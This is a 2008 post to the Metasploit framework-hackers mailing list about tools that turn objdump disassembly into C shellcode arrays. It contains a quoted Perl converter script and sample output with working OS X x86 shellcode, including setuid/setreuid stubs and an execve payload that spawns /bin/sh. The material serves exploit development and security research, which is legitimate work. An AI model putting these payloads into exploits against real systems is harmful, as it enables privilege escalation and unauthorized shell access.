[framework-hackers] create shellcode from objdump

Ramon de Carvalho Valle ramon at risesecurity.org
Wed Feb 13 23:28:29 CST 2008 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

There is also a similar tool in Ruby I wrote to format the assembly
components released in unixasm project. It is called objdumptoc.rb and
is included in unixasm.


http://www.risesecurity.org/project/unixasm/unixasm-1.1.0.tar.gz


Here follows an example.


[ramon at localhost ~]$ as -o osx-x86-shellcode.o
devel/unixasm/trunk/osx-x86-shellcode.s
[ramon at localhost ~]$ objdump -dM suffix osx-x86-shellcode.o | ruby
devel/unixasm/trunk/objdumptoc.rb
char _start[]=              /*  12 bytes                          */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x66\xb8\x37\x01"      /*  movw    $0x137,%ax                */
    "\xcd\x80"              /*  int     $0x80                     */
;

char setreuidcode[]=        /*  9 bytes                           */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\xb0\x7e"              /*  movb    $0x7e,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
;

char setuidcode[]=          /*  8 bytes                           */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\xb0\x17"              /*  movb    $0x17,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
;

char exitcode[]=            /*  7 bytes                           */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\xb0\x01"              /*  movb    $0x1,%al                  */
    "\xcd\x80"              /*  int     $0x80                     */
;

char shellcode[]=           /*  24 bytes                          */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x54"                  /*  pushl   %esp                      */
    "\x54"                  /*  pushl   %esp                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x50"                  /*  pushl   %eax                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xcd\x80"              /*  int     $0x80                     */
;

[ramon at localhost ~]$


Best regards,
Ramon


Prince Brave wrote:
> Usage:
> Assuming that you have optimized your code,then you can just use *objdump* *-d*
> */yourprogram /| genshellcode.pl
> *to generate a c char array to store shellcode.If yourprogram is just what
> compiled from c source,then maybe you want
> to supply the *-v *option to show '\xnn' code with symbol ,that is *objdump*
> *-d* */yourprogram /| genshellcode.pl -v
>
> *How:
>     it's a quite simple script,just translate the one byte machine code 'nn' in
> the output of objdump to the form '\xnn'
> that can be used in c array.and filter out whatever else.This eliminates the
> time for generate our shellcode manually.
>
> Note:feel free to modify and use it.And if there is some fault,please let me know!
>
>
>
> ------------------------------------------------------------------------
>
> #!/usr/bin/env perl
> =begin comment
> file:genshellcode.pl
> usage:genshellcode.pl [-v] yourdumplie
> 	genshellcode.pl < youfile
> 	and you can use it in pipe
> 	or use the -v option to show with symbol
> use this script to generate shellcode array for c program from objdump -d
> you may modify the variable $code_perline to define how many '\xnn' to show
> by:Wang ziyong
> =end comment
> =cut
> use warnings;
> use strict;
> use Getopt::Std;
> my $verbose=0;
> my %options=();
> getopts('v',\%options);
> $verbose=1 if defined$options{v};
> my $code_perline=15;
> my $code=0;
> print "char shellcode[]=\n\"" if !$verbose;
> while(<>){
> #select lines containing machine code
> 	if(/^ [0-9a-f ]{7}:\t([ 0-9a-z]{2,})(\t.*)?/){
> 		my $opcodes=$1;
> #remove any trailing blank
> 		$opcodes =~ s/\s+$//;
> #convert machine code 'nn' to '\x00' and do some format stuff
> 		my @opcode=split(/ /,$opcodes);
> 		foreach(@opcode){
> 			print "\\x",$_;
> 			$code+=1;
> 			unless($code < $code_perline){
> 				print "\"\n\"" if !$verbose;
> 				print "\n" if $verbose;
> 				$code=0;
> 			}
> 		}
> 	}else{
> 		next if $_ eq "\n";
> 		if($verbose){
> 			if($code < $code_perline){
> 				print "\n";
> 			}
> 			print "\n",$_ if $verbose ;
> 		}
> 	}
> }
> if($code != $code_perline){
> 	print "\";\n" if !$verbose;
> 	print "\n" if $verbose;
> }else{
> 	print ";" if !$verbose;
> }
>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers at spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQFHs9F9GIS0iEuhp4MRAvcDAJ9Bd8g4me6XEHEw0ptLrlIQRWWjAwCdGR2T
Fkr9e/hstXhIY0ZVuQRdK6U=
=8qdr
-----END PGP SIGNATURE-----

More information about the Framework-Hackers mailing list